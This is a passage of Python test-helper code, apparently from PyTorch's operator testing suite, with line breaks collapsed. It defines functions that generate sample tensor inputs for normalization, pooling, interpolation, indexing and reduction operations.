4, 3, 3), None, {}), ) for input_shape, weight, bias, kwargs in cases: # Batched yield SampleInput(make_arg(input_shape), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) # Unbatched yield SampleInput(make_arg(input_shape[1:]), args=( make_arg(weight), make_arg(bias) if bias is not None else bias ), kwargs=kwargs) def sample_inputs_group_norm(opinfo, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input shape, num groups, and eps cases: Tuple[Tuple[int], int, float] = ( # type: ignore[assignment] ((1, 6, 3), 2, 0.5), ((2, 6, 3), 2, -0.5), ((1, 2), 1, None), ((0, 2), 1, None), ) for input_shape, num_groups, eps in cases: # Shape of weight and bias should be the same as num_channels weight = make_arg(input_shape[1]) bias = make_arg(input_shape[1]) kwargs = {'weight': weight, 'bias': bias} if eps is None else {'weight': weight, 'bias': bias, 'eps': eps} yield SampleInput( make_arg(input_shape), args=(num_groups,), kwargs=kwargs ) # Without any optional args yield SampleInput(make_arg((1, 2)), args=(1,)) def sample_inputs_instance_norm(opinfo, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_arg_without_requires_grad = partial(make_tensor, device=device, dtype=dtype, requires_grad=False) # Ordered as: input shape, kwargs for momentum, eps cases: Tuple[Tuple[int], dict] = ( # type: ignore[assignment] ((S, S, S), {'momentum': 0.5, 'eps': 0.6}), ((S, S, S), {'momentum': 0.5, 'eps': 0.6, 'use_input_stats': True}), ((3, 2, 4), {'momentum': -1.2}), ((3, 2, 4), {'momentum': 0.0}), ((3, 2, 3, 4), {'momentum': -1.0, 'eps': 0.5}), ((3, 2, 3, 4), {'momentum': -1.0, 'eps': 0.5}), ) for input_shape, kwargs in cases: # args: running mean, running var, weight and bias should necessarily be of shape: (channels,) channels = input_shape[1] weight = make_arg(channels) bias = make_arg(channels) running_mean = make_arg_without_requires_grad(channels, low=0) running_var = make_arg_without_requires_grad(channels, low=0) new_kwargs = { 'running_mean': running_mean, 'running_var': running_var, 'weight': weight, 'bias': bias, **kwargs } yield SampleInput( make_arg(input_shape), args=(), kwargs=new_kwargs ) # Checking for permutations of weights and biases as `None` # instance_norm assumes that if there's a bias, there's a weight weights = [channels, None] biases = [None, None] for weight_channels, bias_channels in zip(weights, biases): running_mean = make_arg_without_requires_grad(channels, low=0) running_var = make_arg_without_requires_grad(channels, low=0) yield SampleInput( make_arg(input_shape), args=(), kwargs={ 'running_mean': running_mean, 'running_var': running_var, 'weight': make_arg(weight_channels) if weight_channels is not None else None, 'bias': make_arg(bias_channels) if bias_channels is not None else None } ) # Test case for no optional kwargs yield SampleInput(make_arg((1, 2, 3)), kwargs={}) def sample_inputs_layer_norm(opinfo, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input shape, normalized_shape and a kwarg dict for eps cases: Tuple[Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 2, 3), (1, 2, 3), {'eps': 0.5}), ((2, 2, 3), (2, 3), {'eps': -0.5}), ((1,), (1,), {}), ((1, 2), (2,), {}), ((0, 1), (1,), {}), ) for input_shape, normalized_shape, kwargs in cases: # Shape of weight and bias should be the same as normalized_shape weight = make_arg(normalized_shape) bias = make_arg(normalized_shape) yield SampleInput( make_arg(input_shape), args=(normalized_shape, weight, bias), kwargs=kwargs ) # Without any optional args yield SampleInput(make_arg((1, 2)), args=((2,),)) # TODO: @krshrimali, once to_numpy method in SampleInput class is modified to take None inputs, # enable these inputs; see https://github.com/pytorch/pytorch/pull/63276#discussion_r691950400 # With weight and a `None` bias # yield SampleInput(make_arg((1, 2)), args=((2,), make_arg((2,)), None)) # With `None` weight and bias (tests failing for this, see the link above) # yield SampleInput(make_arg((1, 2)), args=((2,), None, make_arg((2,)))) def sample_inputs_local_response_norm(opinfo, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Ordered as input shape, size and a kwarg dict for alpha, beta, and k cases: Tuple[Tuple[int], Tuple[int], dict] = ( # type: ignore[assignment] ((1, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}), ((1, 6, 3), 2, {'beta': 0.5, 'k': 1.25}), ((1, 6, 3), 2, {'alpha': 3e-05, 'k': 1.25}), ((1, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5}), ((1, 6, 3), 2, {'alpha': 3e-05}), ((1, 6, 3), 2, {'beta': 0.5}), ((1, 6, 3), 2, {'k': 1.25}), ((1, 6, 3), 2, {}), ((2, 6, 3), 2, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}), ((1, 1, 2), 1, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}), ((0, 1, 2), 1, {'alpha': 3e-05, 'beta': 0.5, 'k': 1.25}), ) for input_shape, size, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(size,), kwargs=kwargs) def sample_inputs_hardswish(self, device, dtype, requires_grad, **kwargs): N = 5 # make sure we are testing -3 -> 3 range. default is -10 -> 10 so maybe unnecessary ? tensors = [SampleInput(make_tensor((N * 2, N * 2), device=device, dtype=dtype, requires_grad=requires_grad, low=-5, high=5)) for _ in range(1, N)] return tensors def sample_inputs_linear(self, device, dtype, requires_grad, **kwargs): features_options = [[3, 4], [8, 8]] batch_options: List[List[int]] = [ [], # no batch [0], [8], [2, 3], ] create_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-2, high=2) sample_inputs = [] for has_bias, (in_feat, out_feat), batch_shape in \ itertools.product([True, False], features_options, batch_options): input_tensor = create_tensor(batch_shape + [in_feat]) weight = create_tensor([out_feat, in_feat]) if not has_bias: sample_inputs.append(SampleInput(input_tensor, args=(weight,))) continue bias = create_tensor([out_feat]) sample_inputs.append(SampleInput(input_tensor, args=(weight, bias))) return sample_inputs def sample_inputs_bilinear(self, device, dtype, requires_grad, **kwargs): features_options = [[3, 4, 5], [8, 8, 8]] batch_options: List[List[int]] = [ [], # no batch [0], [8], [2, 3], ] create_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-2, high=2) sample_inputs = [] for has_bias, (in_feat1, in_feat2, out_feat), batch_shape in \ itertools.product([True, False], features_options, batch_options): input_tensor1 = create_tensor(batch_shape + [in_feat1]) input_tensor2 = create_tensor(batch_shape + [in_feat2]) weight = create_tensor([out_feat, in_feat1, in_feat2]) if not has_bias: sample_inputs.append(SampleInput(input_tensor1, args=(input_tensor2, weight,))) continue bias = create_tensor([out_feat]) sample_inputs.append(SampleInput(input_tensor1, args=(input_tensor2, weight, bias))) return sample_inputs def sample_inputs_glu(self, device, dtype, requires_grad, **kwargs): features_options = [[2], [2, 4], [8, 8], [3, 6, 8], [1, 4, 6, 7]] batch_options: List[List[int]] = [ [], # no batch [0], [8], [2, 3], ] create_tensor = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-2, high=2) sample_inputs = [] for features, batch_shape in itertools.product(features_options, batch_options): ndim = len(features) + len(batch_shape) for dim in range(ndim): input_tensor = create_tensor(batch_shape + features) dim_size = input_tensor.size(dim) if dim_size > 0 and dim_size % 2 == 0: sample_inputs.append(SampleInput(input_tensor, args=(dim,))) return sample_inputs def sample_inputs_interpolate(mode, self, device, dtype, requires_grad, **kwargs): N, C = 2, 3 D = 4 S = 3 L = 5 align_corners_options: Tuple[Any, ...] = (None,) if mode in ('linear', 'bilinear', 'bicubic', 'trilinear'): align_corners_options = (True, False, None) ranks_for_mode = { 'nearest': [1, 2, 3], 'linear': [1], 'bilinear': [2], 'bicubic': [2], 'trilinear': [3], 'area': [1, 2, 3] } def shape(size, rank, with_batch_channel=True): if with_batch_channel: return tuple([N, C] + ([size] * rank)) return tuple([size] * rank) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-1, high=1) sample_inputs = [] for align_corners in align_corners_options: for rank in ranks_for_mode[mode]: sample_inputs.extend([ SampleInput(make_arg(shape(D, rank)), args=(shape(S, rank, False), None, mode, align_corners)), SampleInput(make_arg(shape(D, rank)), args=(shape(L, rank, False), None, mode, align_corners)), SampleInput(make_arg(shape(D, rank)), args=(None, 1.7, mode, align_corners)), SampleInput(make_arg(shape(D, rank)), args=(None, 0.6, mode, align_corners)), ]) return sample_inputs def sample_inputs_upsample(mode, self, device, dtype, requires_grad, **kwargs): N, C = 2, 3 D = 4 S = 3 L = 5 ranks_for_mode = { 'nearest': [1, 2, 3], 'bilinear': [2], } def shape(size, rank, with_batch_channel=True): if with_batch_channel: return tuple([N, C] + ([size] * rank)) return tuple([size] * rank) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, low=-1, high=1) sample_inputs = [] for rank in ranks_for_mode[mode]: sample_inputs.extend([ SampleInput(make_arg(shape(D, rank)), kwargs=dict(size=shape(S, rank, False))), SampleInput(make_arg(shape(D, rank)), kwargs=dict(size=shape(L, rank, False))), SampleInput(make_arg(shape(D, rank)), kwargs=dict(scale_factor=1.7)), SampleInput(make_arg(shape(D, rank)), kwargs=dict(scale_factor=0.6)), ]) return sample_inputs def sample_inputs_gelu(self, device, dtype, requires_grad, **kwargs): N = 5 tensors = [] for _ in range(1, N): for approximate in ['none', 'tanh']: tensors.append(SampleInput( make_tensor((N * 2, N * 2), device=device, dtype=dtype, requires_grad=requires_grad, low=-3, high=3), kwargs=dict(approximate=approximate))) return tensors def sample_inputs_max_min_reduction_with_dim(op_info, device, dtype, requires_grad, **kwargs): inputs = [] args_for_reduction_with_dim = ( ((S, S, S), (1,),), ((S, S, S), (1, True, ),), ((), (0,),), ((), (0, True,),), ) inputs = list((SampleInput(make_tensor(input_tensor, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=args,)) for input_tensor, args in args_for_reduction_with_dim) return inputs def sample_inputs_max_min_reduction_no_dim(op_info, device, dtype, requires_grad, **kwargs): inputs = [] inputs.append(SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)) inputs.append(SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),)) return inputs def _generate_nan_reduction_inputs(device, dtype, requires_grad, **kwargs): yield from _generate_reduction_inputs(device, dtype, requires_grad) yield torch.tensor([2, torch.nan, -1], device=device, dtype=dtype, requires_grad=requires_grad) yield torch.tensor([[torch.nan, 2], [0, 1]], device=device, dtype=dtype, requires_grad=requires_grad) def sample_inputs_nan_reduction(supports_multiple_dims): # Generates sample inputs for reduction ops that contain the input tensor # and dim and keepdim kwargs. If a reduction op needs to test additional # args/kwargs then create a separate sample_inputs function def fn(op_info, device, dtype, requires_grad, **kwargs): inputs = [] for t in _generate_nan_reduction_inputs(device, dtype, requires_grad): # Add case without dim and keepdim kwargs inputs.append(SampleInput(t.clone().requires_grad_(requires_grad))) for kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims): inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), kwargs=kwargs)) return inputs return fn def sample_inputs_reduction_quantile(op_info, device, dtype, requires_grad, **kwargs): test_quantiles = (0.5, make_tensor((2,), dtype=dtype, device=device, low=0, high=1, requires_grad=requires_grad)) test_interpolations = ['linear', 'midpoint'] inputs = [] for quantiles in test_quantiles: for t in _generate_reduction_inputs(device, dtype, requires_grad): # Add case without dim and keepdim kwargs inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), args=(quantiles,))) for kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims=False): # Interpolation kwarg for now is only supported when providing both dim and keepdim kwargs.setdefault('dim', 0) kwargs.setdefault('keepdim', False) for interpolation in test_interpolations: kwargs['interpolation'] = interpolation inputs.append(SampleInput(t.clone().requires_grad_(requires_grad), args=(quantiles,), kwargs=kwargs)) return inputs def sample_inputs_reduction_count_nonzero(*args, **kwargs): """Sample inputs for count_nonzero""" # count_nonzero does not support keepdim yet for sample in sample_inputs_reduction(*args, **kwargs): sample.kwargs.pop('keepdim', None) yield sample def sample_inputs_leaky_relu(op_info, device, dtype, requires_grad, **kwargs): N = 10 tensors = [SampleInput(make_tensor((N, N), device=device, dtype=dtype, requires_grad=requires_grad)) for _ in range(1, N)] return tensors def sample_inputs_fractional_max_pool2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size cases = (((1, 3, 9, 9), 3), ((1, 3, 9, 9), (4, 4)), ((1, 3, 9, 9), (6, 6)), ((2, 3, 9, 9), (3, 3)), ((1, 1, 4, 4), (2, 2)), ((1, 2, 6, 6), (4, 4))) samples = [] for input_shape, kernel_size in cases: for return_indices in [False, True]: # test case passing a single output size samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_size=(2), return_indices=return_indices) )) # test case passing a tuple output size samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_size=(2, 3), return_indices=return_indices) )) # test case passing an output ratio samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_ratio=(0.5, 0.5), return_indices=return_indices) )) return samples def sample_inputs_fractional_max_pool3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size cases = (((2, 3, 5, 5, 5), (2, 2, 2)), ((1, 2, 6, 5, 4), 2), ((1, 2, 5, 6, 5), (2, 3, 2)), ((1, 2, 6, 6, 6), (2, 3, 2)), ((1, 1, 7, 6, 7), (2, 3, 4)), ((1, 1, 4, 5, 4), (2, 2, 1)), ((1, 1, 8, 7, 6), (4, 3, 2)), ((0, 1, 4, 5, 4), (2, 2, 1))) samples = [] for input_shape, kernel_size in cases: for return_indices in [False, True]: # test case passing a single output size samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_size=(2), return_indices=return_indices) )) # test case passing a tuple output size samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_size=(2, 3, 2), return_indices=return_indices) )) # test case passing an output ratio samples.append(SampleInput( make_arg(input_shape), args=(kernel_size,), kwargs=dict(output_ratio=(0.5, 0.5, 0.5), return_indices=return_indices) )) return samples def sample_inputs_avgpool2d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override cases = (((1, 3, 9, 9), 3, 1, 1, True, False, 2), ((1, 3, 9, 9), (4, 4), (2, 3), 1, True, False, 2), ((1, 3, 9, 9), (6, 6), (3, 3), (2, 3), True, True, 2), ((2, 3, 9, 9), (3, 3), (1, 1), (1, ), True, False, 2), ((1, 1, 4, 4), (2, 2), (), (0, ), False, True, -2), ((1, 2, 6, 6), (4, 4), (2, 2), (2, ), True, True, None)) for input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override in cases: yield SampleInput(make_arg(input_shape), args=(kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override)) # Case with just input_shape and kernel_size yield SampleInput(make_arg((1, 3, 9, 9)), args=((3, 3))) def sample_inputs_avgpool1d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size, kwargs cases: List[Tuple[Tuple[int, ...], Union[int, Tuple[int, ...]], Dict]] = [ ((2, 3, 9), (3,), dict()), ((1, 3, 9), 3, dict(stride=1, padding=1, ceil_mode=True, count_include_pad=False)), ((1, 3, 9), (6,), dict(stride=(3,), padding=(2,), ceil_mode=True, count_include_pad=True)), ((2, 3, 9), (3,), dict(stride=(1,), padding=(1,), ceil_mode=False, count_include_pad=True)), ((0, 3, 9), (6,), dict(stride=(3,), padding=(2,), ceil_mode=False, count_include_pad=True)), ((1, 2, 9), (7,), dict(stride=(3,), padding=(2,), ceil_mode=False)), ((1, 2, 9), (7,), dict(stride=(3,), padding=(3,), ceil_mode=True)), ((1, 2, 9), (7,), dict(stride=(3,), ceil_mode=False)), ((1, 2, 9), (7,), dict(stride=(3,), ceil_mode=True)), ] for input_shape, kernel_size, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(kernel_size,), kwargs=kwargs) def sample_inputs_avgpool3d(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Order: input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override cases: List[Tuple[Tuple[int, ...], Union[int, Tuple[int, ...]], Dict]] = [ ((2, 3, 3, 4, 4), (2, 2, 2), dict()), ((1, 2, 4, 4, 4), 2, dict(stride=1, padding=1, ceil_mode=True, count_include_pad=False, divisor_override=2)), ((1, 2, 5, 5, 5), (2, 3, 4), dict(stride=(1, 2, 2), padding=(0, 1, 2), ceil_mode=True, count_include_pad=True, divisor_override=2)), ((1, 2, 5, 5, 5), (2, 3, 4), dict(stride=(1, 2, 2), padding=(0, 1, 2), ceil_mode=False)), ((1, 1, 7, 5, 7), (6, 3, 4), dict(stride=(2, 3, 2), padding=(3, 1, 0), ceil_mode=False, count_include_pad=False, divisor_override=2)), ((1, 1, 4, 5, 4), (2, 2, 3), dict(stride=(2, 2, 1), padding=0, ceil_mode=False, count_include_pad=True, divisor_override=-2)), ((1, 1, 6, 5, 6), (4, 5, 6), dict(stride=(2, 3, 2), padding=2, ceil_mode=True, count_include_pad=True, divisor_override=None)), ((0, 1, 4, 5, 4), (2, 3, 1), dict(stride=(2, 1, 2), padding=0, ceil_mode=False, count_include_pad=True, divisor_override=None)), ] for input_shape, kernel_size, kwargs in cases: yield SampleInput(make_arg(input_shape), args=(kernel_size,), kwargs=kwargs) def sample_inputs_topk(op_info, device, dtype, requires_grad, **kwargs): def get_tensor_input(size): return make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad) inputs = [] inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3,))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1, True))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2, True))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1, True, True))) inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2, True, True))) inputs.append(SampleInput(get_tensor_input(()), args=(1,))) inputs.append(SampleInput(get_tensor_input(()), args=(1, 0))) inputs.append(SampleInput(get_tensor_input(()), args=(1, -1))) inputs.append(SampleInput(get_tensor_input(()), args=(1, 0, True))) inputs.append(SampleInput(get_tensor_input(()), args=(1, -1, True))) inputs.append(SampleInput(get_tensor_input(()), args=(1, 0, True, True))) inputs.append(SampleInput(get_tensor_input(()), args=(1, -1, True, True))) return inputs def sample_inputs_outer(op_info, device, dtype, requires_grad, **kwargs): inputs = [] arg_a = make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad) arg_b = make_tensor((M,), dtype=dtype, device=device, requires_grad=requires_grad) inputs.append(SampleInput(arg_a, args=(arg_b,))) return inputs def sample_inputs_dist(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) sizes = ((S, S, S), (S,), (S, 1, S), (), (S, S)) ps = (2, 4) for size_x, size_y, p in product(sizes, sizes, ps): yield SampleInput(make_arg(size_x), args=(make_arg(size_y), p)) # Missing to test the nondeterminism of the operation # https://github.com/pytorch/pytorch/issues/53352 def sample_inputs_index(op_info, device, dtype, requires_grad, **kwargs): # target.index_select(dim, idx) select = op_info.name == "index_select" # target.index_add(dim, idx, source, *, alpha=1) add = op_info.name == "index_add" # target.index_copy(dim, idx, source) copy = op_info.name == "index_copy" # target.index_fill(dim, idx, value) fill = op_info.name == "index_fill" make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) make_permutation = partial(torch.randperm, device=device, dtype=torch.int64) def make_idx(n): return make_tensor((n,), device=device, dtype=torch.int64, low=0, high=n) shapes = [(), (1,), (S, S)] # extra parameter for add alphas = (-1, 0, 2) if add else (None,) for shape, alpha in product(shapes, alphas): t = make_arg(shape) args = [] # dim. We handle the scalar case dim = 1 if t.ndim == 2 else 0 args.append(dim) # idx They need to be different for copy and add to be deterministic make_idx_fn = make_permutation if copy or add else make_idx idx = make_idx_fn(t.shape[dim] if t.ndim != 0 else 1) args.append(idx) # source if copy or add: args.append(make_arg(shape)) elif fill: # A weird number to catch errors args.append(make_arg((1,)).item()) args = tuple(args) kwargs = {} if alpha is None else {"alpha": alpha} yield SampleInput(t, args=args, kwargs=kwargs) def sample_inputs_index_reduce(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) def make_idx(n, m): return make_tensor((n,), device=device, dtype=torch.int64, low=0, high=m) shapes = [((), ()), ((1,), (1,)), ((S, S), (S, M)), ((S, S, S), (S, M, S))] include_selfs = (True, False) reduces = ('prod', 'mean', 'amin', 'amax') for shape, include_self, reduce in product(shapes, include_selfs, reduces): self_shape, src_shape = shape # dim. We handle the scalar case dim = 1 if len(self_shape) >= 2 else 0 idx = make_idx(src_shape[dim] if len(src_shape) != 0 else 1, self_shape[dim] if len(self_shape) != 0 else 1) args = (dim, idx, make_arg(src_shape), reduce) yield SampleInput(make_arg(self_shape), args=args, kwargs={'include_self' : include_self}) # Sample inputs to test edge cases for backward if requires_grad: # Check that gradients are propagated correctly for prod when zeros in self/src are reduced # This sample tests gradients for the following cases # (a) 1 zero reduced (from source (self[0, 1]), from self (self[0, 0])) # (b) 2 zeros reduced (1 from src and 1 from self (self[1, 0], self[1, 1]) # (c) no zeros reduced (self[2, 1], self[2, 2]) # (d) 2 zeros reduced (both from src) is tested in test/test_autograd.py # test_scatter_index_reduce_prod_gradgrad_error as this case is not supported for gradgrad input = torch.tensor([[0, 13], [0, 0], [15, 19]], dtype=dtype, device=device, requires_grad=requires_grad) src = torch.tensor([[2, 0], [0, 0], [2, 3], [2, 2]], dtype=dtype, device=device, requires_grad=requires_grad) idx = torch.tensor([0, 1, 2, 0], dtype=torch.long, device=device) yield SampleInput(input, args=(0, idx, src, 'prod'), kwargs={'include_self': True}) def sample_inputs_mode(op_info, device, dtype, requires_grad, **kwargs): inputs = [] args = ( ((S, S, S), (),), ((S, S, S), (1, ),), ((S, S, S), (1, True, ),), ((), (),), ((), (0,),), ((), (0, True,),), ) inputs = list((SampleInput(make_tensor(input_tensor, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=args,)) for input_tensor, args in args) return inputs # Missing to test the nondeterminism of the operation # https://github.com/pytorch/pytorch/issues/53352 def sample_inputs_put(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) make_idx = partial(make_tensor, low=0, dtype=torch.int64, device=device, requires_grad=False) S = 3 # Generic inputs idx = torch.randperm(S * S, device=device, dtype=torch.int64)[:S] idx_list = [idx, -idx - 1] for idx, acc in product(idx_list, (True, False)): yield SampleInput(input=make_arg((S, S)), args=(idx.clone(), make_arg((S,)), acc)) # Scalar cases scalar_sizes = [(), (1,)] tgt_gen = (make_arg(size) for size in scalar_sizes) idx_gen = (make_idx(size, high=1) for size in scalar_sizes) src_gen = (make_arg(size) for size in scalar_sizes) for tgt, idx, src, acc in product(tgt_gen, idx_gen, src_gen, (True, False)): yield SampleInput(input=tgt.clone().requires_grad_(requires_grad), args=(idx.clone(), src.clone().requires_grad_(requires_grad), acc)) # Empty cases tgt_sizes = [(0,), (), (1,), (3, 2)] tgt_gen = (make_arg(size) for size in tgt_sizes) idx = make_idx((0,), high=1) src = make_arg((0,)) for tgt, acc in product(tgt, (True, False)): yield SampleInput(input=tgt.clone().requires_grad_(requires_grad), args=(idx.clone(), src.clone().requires_grad_(requires_grad), acc)) def sample_inputs_take(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) make_idx = partial(make_tensor, low=0, dtype=torch.int64, device=device, requires_grad=False) S = 3 # Generic inputs: take S elements out of S * S index = make_idx((S,), high=(S * S)) for idx in (index, -index - 1): yield SampleInput(input=make_arg((S, S)), args=(idx,)) # Scalar cases scalar_sizes = [(), (1,)] src_gen = (make_arg(size) for size in scalar_sizes) idx_gen = (make_idx(size, high=1) for size in scalar_sizes) for src, idx in product(src_gen, idx_gen): yield SampleInput(input=src.clone().requires_grad_(requires_grad), args=(idx.clone(),)) # Empty cases src_sizes = [(0,), (), (1,), (3, 2)] src_gen = (make_arg(size) for size in src_sizes) idx = make_idx((0,), high=1) for src in src_gen: yield SampleInput(input=src.clone().requires_grad_(requires_grad), args=(idx.clone(),)) def sample_movedim_moveaxis(op_info, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((4, 3, 2, 1), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([0, 1, 2, 3], [3, 2, 1, 0])), SampleInput( make_tensor((4, 3, 2, 1), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=([0, -1, -2, -3], [-3, -2, -1, -0])) ) def sample_repeat_tile(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) rep_dims = ((), (0, ), (1, ), (0, 2), (1, 1), (2, 3), (2, 3, 2), (0, 2, 3), (2, 1, 1, 1),) shapes = ((), (0,), (2,), (3, 0), (3, 2), (3, 0, 1)) if requires_grad: # Tests for variant_consistency_jit, grad, gradgrad # are slower. Use smaller bags of `rep_dims` and `shapes` # in this case. rep_dims = ((), (0, ), (0, 2), (1, 1), (2, 3), (1, 3, 2), (3, 1, 1)) # type: ignore[assignment] shapes = ((), (0,), (2,), (3, 2)) # type: ignore[assignment] samples = [] for rep_dim, shape in product(rep_dims, shapes): # `torch.repeat` errors for `len(rep_dims) < t.dim()`, # so we filter such combinations. if op_info.name == 'repeat' and len(rep_dim) < len(shape): continue samples.append(SampleInput(make_arg(shape), args=(rep_dim,),)) return samples def sample_inputs_narrow(op_info, device, dtype, requires_grad, **kwargs): shapes_and_args = ( ((S, S, S), (1, 2, 2)), ((S, S, S), (-1, 2, 2)), ((S, S, S), (1, 0, 0)), ((S, S, S), (-1, 0, 0)), ((S, S, S), (2, 1, 2)), ) for shape, args in shapes_and_args: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) yield SampleInput(tensor, args=args) def sample_trapezoid(op_info, device, dtype, requires_grad, **kwargs): y_shape_x_shape_and_kwargs = [ ((2, 3), (2, 3), {}), ((2, 3), (2, 3), {'dim': 1}), ((6,), (6,), {}), ((6,), None, {}), # When 'trapezoid' is called with an empty input, it does not produce an output with requires_grad # See Issue #{61619} # ((6,0), (6,0), {}), ((2, 3), (1, 3), {}), ((3, 3), (3, 3), {}), ((3, 3), (3, 3), {'dim': -2}), ((5,), None, {'dx': 2.0}), ((2, 2), None, {'dx': 3.0}) ] samples = [] for y_shape, x_shape, kwarg in y_shape_x_shape_and_kwargs: y_tensor = make_tensor(y_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if x_shape is not None: x_tensor = make_tensor(x_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(y_tensor, args=(x_tensor,), kwargs=kwarg)) else: samples.append(SampleInput(y_tensor, kwargs=kwarg)) return samples def sample_cumulative_trapezoid(op_info, device, dtype, requires_grad, **kwargs): y_shape_x_shape_and_kwargs = [ ((2, 3), (2, 3), {}), ((2, 3), (2, 3), {'dim': 1}), ((6,), (6,), {}), ((6,), None, {}), # When 'cumulative_trapezoid' is called with an empty input, it does not produce an output with requires_grad # See Issue #{61619} # ((6,0), (6,0), {}), ((2, 3), (1, 3), {}), ((3, 3), (3, 3), {}), ((3, 3), (3, 3), {'dim': -2}), ((5,), None, {'dx': 2.0}), ((2, 2), None, {'dx': 3.0}) ] samples = [] for y_shape, x_shape, kwarg in y_shape_x_shape_and_kwargs: y_tensor = make_tensor(y_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if x_shape is not None: x_tensor = make_tensor(x_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(y_tensor, args=(x_tensor,), kwargs=kwarg)) else: samples.append(SampleInput(y_tensor, kwargs=kwarg)) return samples def sample_unsqueeze(op_info, device, dtype, requires_grad, **kwargs): shapes_and_axes = [ ((3, 4, 5), 0), ((3, 4, 5), 1), ((3, 4, 5), 3), ((3, 4, 5), -1), ((3, 4, 5), -3), ((), 0), ((), -1), ((1,), 0), ((1,), -1), ] samples = [] for shape, axis in shapes_and_axes: tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) samples.append(SampleInput(tensor, args=(axis,),)) return samples def sample_inputs_nn_unfold(op_info, device, dtype, requires_grad, **kwargs): shapes = ((0, 1, 5, 5), (1, 1, 5, 5), (2, 3, 5, 5)) kernel_sizes = (2, (2, 2), (3, 3)) dilations = (1, 2, (1, 2)) paddings = (0, 1, (1, 1)) strides = (1, 2, (1, 2)) cases = product(shapes, kernel_sizes, dilations, paddings, strides) for shape, kernel_size, dilation, padding, stride in cases: tensor = make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(tensor, args=(kernel_size, dilation, padding, stride)) # With default args yield SampleInput(make_tensor((1, 1, 5, 5), dtype=dtype, device=device, requires_grad=requires_grad), args=((3, 